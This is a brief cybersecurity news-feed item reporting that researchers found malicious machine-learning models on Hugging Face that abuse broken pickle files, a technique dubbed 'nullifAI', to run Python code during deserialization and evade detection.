CyberSecurity updates
2025-02-23 16:20:32 Pacfic

Malicious ML Models on Hugging Face Exploit Pickle Format - 14d
Malicious ML Models on Hugging Face Exploit Pickle Format

Researchers have identified malicious machine learning (ML) models on Hugging Face, leveraging a novel technique involving ‘broken’ pickle files to evade detection. This attack, dubbed ‘nullifAI’, abuses the Pickle file serialization process, allowing Python code execution during ML model deserialization. The malicious models were not initially flagged as unsafe by Hugging Face’s security mechanisms.